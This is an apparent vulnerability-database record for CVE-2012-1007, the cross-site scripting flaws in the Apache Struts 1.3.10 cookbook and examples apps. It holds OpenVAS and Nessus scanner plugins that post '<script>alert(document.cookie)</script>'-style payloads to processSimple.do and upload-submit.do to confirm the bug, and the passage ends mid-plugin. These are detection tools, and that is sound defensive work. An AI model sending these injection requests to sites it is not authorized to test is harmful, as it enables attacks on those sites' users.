script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to multiple Cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP POST request\n and check whether it is able to read cookie or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws due to an,\n\n - Input passed via the 'message' parameter in 'processSimple.do' and\n 'processDyna.do' action is not properly verified before it is returned\n to the user.\n\n - Input passed via the 'name' and 'queryParam' parameter in\n '/struts-examples/upload/upload-submit.do' action is not properly verified\n before it is returned to the user.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow an\n attacker to execute arbitrary HTML code in a user's browser session in the\n context of a vulnerable application.\n\n .\");\n\n script_tag(name:\"affected\", value:\"Apache Struts (cookbook, examples) version 1.3.10 and prior.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.3 or later,\n For updates refer to http://struts.apache.org/download.cgi\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://secpod.org/blog/?p=450\");\n script_xref(name:\"URL\", value:\"http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nasport = 0;\nasreq = NULL;\nasres = NULL;\nasRes = NULL;\n\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\nhost = http_host_name(port:asport);\n\n## Make list index pages\nforeach indexpage (make_list(\"/\", \"/welcome.do\"))\n{\n asreq = http_get(item:string(dir, indexpage), port:asport);\n\n if(!isnull(asreq))\n {\n asres = http_keepalive_send_recv(port:asport, data:asreq);\n\n if(!isnull(asres) && \">Struts Cookbook<\" >< asres)\n {\n postdata = \"name=xyz&secret=xyz&color=red&message=%3Cscript%3Ealert\" +\n \"%28document.cookie%29%3C%2Fscript%3E&hidden=Sssh%21+It%\" +\n \"27s+a+secret.+Nobody+knows+I%27m+here.\";\n\n asReq = string(\"POST \", dir, \"/processSimple.do HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", OPENVAS_HTTP_USER_AGENT, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n ## Confirm the exploit\n if(asRes =~ \"HTTP/1\\.. 200\" && \"<script>alert(document.cookie)</script>\" >< asRes &&\n \">Simple ActionForm Example<\" >< asRes)\n {\n security_message(asport);\n exit(0);\n }\n }\n\n if(!isnull(asres) && \">Struts Examples<\" >< asres)\n {\n postdata = '-----------------------------7559840272055538773136052934' +\n '\\r\\nContent-Disposition: form-data; name=\"theText\"\\r\\n\\r\\n' +\n '\\r\\n-----------------------------7559840272055538773136052' +\n '934\\r\\nContent-Disposition: form-data; name=\"theFile\"; fil' +\n 'ename=\"\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n' +\n '\\r\\n-----------------------------7559840272055538773136052' +\n '934\\r\\nContent-Disposition: form-data; name=\"filePath\"\\r\\n' +\n '\\r\\n<script>alert(document.cookie)</script>\\r\\n-----------' +\n '------------------7559840272055538773136052934--\\r\\n';\n\n asReq = string(\"POST \", dir, \"/upload/upload-submit.do?queryParam=Successful HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", OPENVAS_HTTP_USER_AGENT, \"\\r\\n\",\n \"Content-Type: multipart/form-data; boundary=---\" +\n \"------------------------7559840272055538773136052934\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n if(asRes =~ \"HTTP/1\\.. 200\" &&\n \"<script>alert(document.cookie)</script>\" >< asRes &&\n \">File Upload Example<\" >< asRes)\n {\n security_message(asport);\n exit(0);\n }\n }\n }\n}\n", "title": "Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities", "type": "openvas", "viewCount": 3}, "differentElements": ["modified", "sourceData"], "edition": 7, "lastseen": "2018-09-14T15:44:38"}], "edition": 12, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "63f251d2d4cd1e13840040e6efe06b02"}, {"key": "cvss", "hash": "6e9bdd2021503689a2ad9254c9cdf2b3"}, {"key": "description", "hash": "adb13615c304e59dcac77fe4f514b658"}, {"key": "href", "hash": "6726cb59797400dc00f67e6206bce00a"}, {"key": "modified", "hash": "28fcbc7c2913d8af0ff0d13404531ae9"}, {"key": "naslFamily", "hash": "55199d25018fbdb9b50e6b64d444c3a4"}, {"key": "pluginID", "hash": "efc663435ab5bd98517b05c5b7b21cb1"}, {"key": "published", "hash": "6c5c375f27b9954bea64597d4bcf9b86"}, {"key": "references", "hash": "cda3f379f5c476617024346b22f9387b"}, {"key": "reporter", "hash": "a282f166ddc6c378940071a6b738e1a3"}, {"key": "sourceData", "hash": "1085c3564c7cdc522962c8861968a2f4"}, {"key": "title", "hash": "8d096a067f3cb257684a509c3f5930d1"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "hash": "b55e7ea0477c9a0f3963035187b4ae291efa52b586aaf3ab8417070484f07380", "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-1007"]}, {"type": "nessus", "idList": ["STRUTS_EXAMPLES_XSS.NASL", "STRUTS_COOKBOOK_XSS.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:802423"]}, {"type": "exploitdb", "idList": ["EDB-ID:18452"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2017-3236618", "ORACLE:CPUOCT2016-2881722", "ORACLE:CPUOCT2018-4428296"]}], "modified": "2019-02-14T14:56:01"}, "score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_cookbook_n_exmp_mul_xss_vuln.nasl 13659 2019-02-14 08:34:21Z cfischer $\n#\n# Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802423\");\n script_version(\"$Revision: 13659 $\");\n script_bugtraq_id(51900);\n script_cve_id(\"CVE-2012-1007\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-14 09:34:21 +0100 (Thu, 14 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-08 17:33:28 +0530 (Wed, 08 Feb 2012)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to multiple Cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP POST request\n and check whether it is able to read cookie or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws due to an,\n\n - Input passed via the 'message' parameter in 'processSimple.do' and\n 'processDyna.do' action is not properly verified before it is returned\n to the user.\n\n - Input passed via the 'name' and 'queryParam' parameter in\n '/struts-examples/upload/upload-submit.do' action is not properly verified\n before it is returned to the user.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow an\n attacker to execute arbitrary HTML code in a user's browser session in the\n context of a vulnerable application.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts (cookbook, examples) version 1.3.10 and prior.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.3 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://secpod.org/blog/?p=450\");\n script_xref(name:\"URL\", value:\"http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n\n script_xref(name:\"URL\", value:\"http://struts.apache.org/download.cgi\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\nuseragent = http_get_user_agent();\nhost = http_host_name(port:asport);\n\nforeach indexpage (make_list(\"/\", \"/welcome.do\"))\n{\n asreq = http_get(item:string(dir, indexpage), port:asport);\n\n if(!isnull(asreq))\n {\n asres = http_keepalive_send_recv(port:asport, data:asreq);\n\n if(!isnull(asres) && \">Struts Cookbook<\" >< asres)\n {\n postdata = \"name=xyz&secret=xyz&color=red&message=%3Cscript%3Ealert\" +\n \"%28document.cookie%29%3C%2Fscript%3E&hidden=Sssh%21+It%\" +\n \"27s+a+secret.+Nobody+knows+I%27m+here.\";\n\n asReq = string(\"POST \", dir, \"/processSimple.do HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", useragent, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n if(asRes =~ \"HTTP/1\\.. 200\" && \"<script>alert(document.cookie)</script>\" >< asRes &&\n \">Simple ActionForm Example<\" >< asRes)\n {\n security_message(asport);\n exit(0);\n }\n }\n\n if(!isnull(asres) && \">Struts Examples<\" >< asres)\n {\n postdata = '-----------------------------7559840272055538773136052934' +\n '\\r\\nContent-Disposition: form-data; name=\"theText\"\\r\\n\\r\\n' +\n '\\r\\n-----------------------------7559840272055538773136052' +\n '934\\r\\nContent-Disposition: form-data; name=\"theFile\"; fil' +\n 'ename=\"\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n' +\n '\\r\\n-----------------------------7559840272055538773136052' +\n '934\\r\\nContent-Disposition: form-data; name=\"filePath\"\\r\\n' +\n '\\r\\n<script>alert(document.cookie)</script>\\r\\n-----------' +\n '------------------7559840272055538773136052934--\\r\\n';\n\n asReq = string(\"POST \", dir, \"/upload/upload-submit.do?queryParam=Successful HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", useragent, \"\\r\\n\",\n \"Content-Type: multipart/form-data; boundary=---\" +\n \"------------------------7559840272055538773136052934\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n if(asRes =~ \"HTTP/1\\.. 200\" &&\n \"<script>alert(document.cookie)</script>\" >< asRes &&\n \">File Upload Example<\" >< asRes)\n {\n security_message(asport);\n exit(0);\n }\n }\n }\n}\n", "naslFamily": "Web application abuses", "pluginID": "1361412562310802423", "scheme": null}

{"cve": [{"lastseen": "2018-10-18T15:08:22", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do.", "modified": "2018-10-16T21:29:00", "published": "2012-02-06T23:09:20", "id": "CVE-2012-1007", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1007", "title": "CVE-2012-1007", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "openvas": [{"lastseen": "2017-07-02T21:10:39", "bulletinFamily": "scanner", "description": "This host is running Apache Struts and is\n prone to multiple Cross-site scripting vulnerabilities.", "modified": "2017-04-03T00:00:00", "published": "2012-02-08T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=802423", "id": "OPENVAS:802423", "title": "Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities", "type": "openvas", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_cookbook_n_exmp_mul_xss_vuln.nasl 5841 2017-04-03 12:46:41Z cfi $\n#\n# Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_id(802423);\n script_version(\"$Revision: 5841 $\");\n script_bugtraq_id(51900);\n script_cve_id(\"CVE-2012-1007\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-03 14:46:41 +0200 (Mon, 03 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-08 17:33:28 +0530 (Wed, 08 Feb 2012)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities\");\n\n script_tag(name: \"summary\" , value:\"This host is running Apache Struts and is\n prone to multiple Cross-site scripting vulnerabilities.\");\n\n script_tag(name: \"vuldetect\" , value:\"Send a crafted HTTP POST request\n and check whether it is able to read cookie or not.\");\n\n script_tag(name: \"insight\" , value:\"Multiple flaws due to an,\n - Input passed via the 'message' parameter in 'processSimple.do' and\n 'processDyna.do' action is not properly verified before it is returned\n to the user.\n - Input passed via the 'name' and 'queryParam' parameter in\n '/struts-examples/upload/upload-submit.do' action is not properly verified\n before it is returned to the user.\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation could allow an\n attacker to execute arbitrary HTML code in a user's browser session in the\n context of a vulnerable application.\n\n Impact Level: Application.\");\n\n script_tag(name: \"affected\" , value:\"Apache Struts (cookbook, examples) version 1.3.10 and prior.\");\n\n script_tag(name: \"solution\" , value:\"Upgrade to Apache Struts version 2.3.3 or later,\n For updates refer to http://struts.apache.org/download.cgi\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://secpod.org/blog/?p=450\");\n script_xref(name : \"URL\" , value : \"http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nasport = 0;\nasreq = NULL;\nasres = NULL;\nasRes = NULL;\n\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\nhost = http_host_name(port:asport);\n\n## Make list index pages\nforeach indexpage (make_list(\"/\", \"/welcome.do\"))\n{\n ## Send and Receive the response\n asreq = http_get(item:string(dir, indexpage), port:asport);\n\n if(!isnull(asreq))\n {\n asres = http_keepalive_send_recv(port:asport, data:asreq);\n\n ## Confirm the application Struts Cookbook\n if(!isnull(asres) && \">Struts Cookbook<\" >< asres)\n {\n ## Construct the POST Attack for Struts Cookbook\n postdata = \"name=xyz&secret=xyz&color=red&message=%3Cscript%3Ealert\" +\n \"%28document.cookie%29%3C%2Fscript%3E&hidden=Sssh%21+It%\" +\n \"27s+a+secret.+Nobody+knows+I%27m+here.\";\n\n ## Construct the POST request Struts Cookbook\n asReq = string(\"POST \", dir, \"/processSimple.do HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", OPENVAS_HTTP_USER_AGENT, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n ## Confirm the exploit\n if(asRes =~ \"HTTP/1\\.. 200\" && \"<script>alert(document.cookie)</script>\" >< asRes &&\n \">Simple ActionForm Example<\" >< asRes)\n {\n security_message(asport);\n exit(0);\n }\n }\n\n ## Confirm the application Struts Examples\n if(!isnull(asres) && \">Struts Examples<\" >< asres)\n {\n ## Construct the POST data\n postdata = '-----------------------------7559840272055538773136052934' +\n '\\r\\nContent-Disposition: form-data; name=\"theText\"\\r\\n\\r\\n' +\n '\\r\\n-----------------------------7559840272055538773136052' +\n '934\\r\\nContent-Disposition: form-data; name=\"theFile\"; fil' +\n 'ename=\"\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n' +\n '\\r\\n-----------------------------7559840272055538773136052' +\n '934\\r\\nContent-Disposition: form-data; name=\"filePath\"\\r\\n' +\n '\\r\\n<script>alert(document.cookie)</script>\\r\\n-----------' +\n '------------------7559840272055538773136052934--\\r\\n';\n\n ## Construct the POST request\n asReq = string(\"POST \", dir, \"/upload/upload-submit.do?queryParam=Successful HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", OPENVAS_HTTP_USER_AGENT, \"\\r\\n\",\n \"Content-Type: multipart/form-data; boundary=---\" +\n \"------------------------7559840272055538773136052934\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n ## Confirm the exploit\n if(asRes =~ \"HTTP/1\\.. 200\" &&\n \"<script>alert(document.cookie)</script>\" >< asRes &&\n \">File Upload Example<\" >< asRes)\n {\n security_message(asport);\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "nessus": [{"lastseen": "2019-02-21T01:16:59", "bulletinFamily": "scanner", "description": "The remote web server hosts struts-cookbook, a demonstration application for the Struts framework. Input passed via the 'message' parameter to the 'processSimple.do' page is not properly sanitized before using it to generate dynamic HTML. \n\nBy tricking someone into clicking on a specially crafted link, an attacker may be able exploit this to inject arbitrary HTML and script code into a user's browser to be executed within the security context of the affected site.", "modified": "2018-07-30T00:00:00", "id": "STRUTS_COOKBOOK_XSS.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=60093", "published": "2012-07-23T00:00:00", "title": "Apache Struts struts-cookbook processSimple.do message Parameter XSS", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60093);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/07/30 15:31:31\");\n\n script_cve_id(\"CVE-2012-1007\");\n script_bugtraq_id(51900);\n script_xref(name:\"EDB-ID\", value:\"18452\");\n\n script_name(english:\"Apache Struts struts-cookbook processSimple.do message Parameter XSS\");\n script_summary(english:\"Tries to exploit an XSS flaw in Struts-cookbook\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A remote web application is vulnerable to a cross-site scripting\nattack.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote web server hosts struts-cookbook, a demonstration\napplication for the Struts framework. Input passed via the 'message'\nparameter to the 'processSimple.do' page is not properly sanitized\nbefore using it to generate dynamic HTML. \n\nBy tricking someone into clicking on a specially crafted link, an\nattacker may be able exploit this to inject arbitrary HTML and script\ncode into a user's browser to be executed within the security context\nof the affected site.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://secpod.org/blog/?p=450\");\n # http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d16eaf1b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Remove or restrict access to the Struts-cookbook application.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/02/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/07/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:8080);\n\n# Loop through directories.\ndirs = list_uniq(make_list(\"/struts-cookbook\", cgi_dirs()));\nif (thorough_tests) \n{\n struts_1x_versions = make_list(\"1.3.10\",\"1.3.8\",\"1.3.5\",\"1.2.9\",\"1.2.8\",\"1.2.7\",\"1.2.4\", \"1.1\", \"1.0.2\");\n\n foreach ver (struts_1x_versions)\n dirs = list_uniq(make_list(dirs, \"/struts-cookbook-\" + ver));\n}\n\nxss_string = \"<script>alert('\" + SCRIPT_NAME + '_' + rand_str() + \"');</script>\";\n\nattack_page = \"/processSimple.do\";\nverify_page = \"/processSimple.do\";\n\nreport_requests = make_list();\nforeach dir (dirs)\n{\n verify_url = dir + verify_page;\n res = http_send_recv3(method:\"GET\", \n port:port, \n item:verify_url, \n exit_on_fail:TRUE);\n\n if (\n \"<title>Simple form using ActionForm</title>\" >< res[2] && \n 'processSimple.do' >< res[2]\n )\n {\n postdata =\n \"name=nessus&\" +\n \"secret=nessus&\" +\n \"message=\" + xss_string;\n \n attack_url = dir + attack_page;\n\n headers = make_array(\"Content-Type\", \"application/x-www-form-urlencoded\");\n\n res = http_send_recv3(method:\"POST\", \n port:port, \n item:attack_url, \n add_headers:headers,\n data:postdata, \n exit_on_fail:TRUE);\n \n if ('>' + xss_string + '<' >< res[2])\n { \n report_requests = make_list(report_requests, http_last_sent_request());\n output = strstr(res[2], xss_string);\n if (!thorough_tests) break;\n } \n }\n}\n\nif (max_index(report_requests) > 0)\n{\n security_report_v4(\n port : port,\n severity : SECURITY_WARNING,\n generic : TRUE,\n line_limit : 5,\n xss : TRUE, # Sets XSS KB key\n request : report_requests,\n output : chomp(output)\n );\n exit(0);\n}\nelse exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-02-21T01:16:59", "bulletinFamily": "scanner", "description": "The remote web server hosts struts-examples, a demonstration application for the Struts framework. Input passed via the 'theText' POST parameter to the 'upload-submit.do' page is not properly sanitized before using it to generate dynamic HTML. \n\nBy tricking a user into clicking on a specially crafted link, an attacker can exploit this to inject arbitrary HTML and script code into a user's browser to be executed within the security context of the affected site.", "modified": "2018-07-30T00:00:00", "id": "STRUTS_EXAMPLES_XSS.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=60094", "published": "2012-07-23T00:00:00", "title": "Apache Struts struts-examples upload-submit.do 'theText' Parameter XSS", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60094);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/07/30 15:31:31\");\n\n script_cve_id(\"CVE-2012-1007\");\n script_bugtraq_id(51900);\n script_xref(name:\"EDB-ID\", value:\"18452\");\n\n script_name(english:\"Apache Struts struts-examples upload-submit.do 'theText' Parameter XSS\");\n script_summary(english:\"Tries to exploit an XSS flaw in struts-examples\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A remote web application is vulnerable to a cross-site scripting\nattack.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote web server hosts struts-examples, a demonstration\napplication for the Struts framework. Input passed via the 'theText'\nPOST parameter to the 'upload-submit.do' page is not properly\nsanitized before using it to generate dynamic HTML. \n\nBy tricking a user into clicking on a specially crafted link, an\nattacker can exploit this to inject arbitrary HTML and script code\ninto a user's browser to be executed within the security context of\nthe affected site.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://secpod.org/blog/?p=450\");\n # http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d16eaf1b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Remove or restrict access to the Struts-examples application.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/02/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/07/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:8080);\n\n# Loop through directories.\ndirs = list_uniq(make_list(\"/struts-examples\",cgi_dirs()));\nif (thorough_tests) \n{\n struts_1x_versions = make_list(\"1.3.10\",\"1.3.8\",\"1.3.5\",\"1.2.9\",\"1.2.8\",\"1.2.7\",\"1.2.4\", \"1.1\", \"1.0.2\");\n\n foreach ver (struts_1x_versions)\n dirs = list_uniq(make_list(dirs, \"/struts-examples-\" + ver));\n}\n\nxss_string = \"<script>alert('\" + SCRIPT_NAME + '_' + rand_str() + \"');</script>\";\n\nattack_page = \"/upload/upload-submit.do?queryParam=Successful\";\nverify_page = \"/upload/upload-submit.do\";\n\nreport_requests = make_list();\nforeach dir (dirs)\n{\n verify_url = dir + verify_page;\n res = 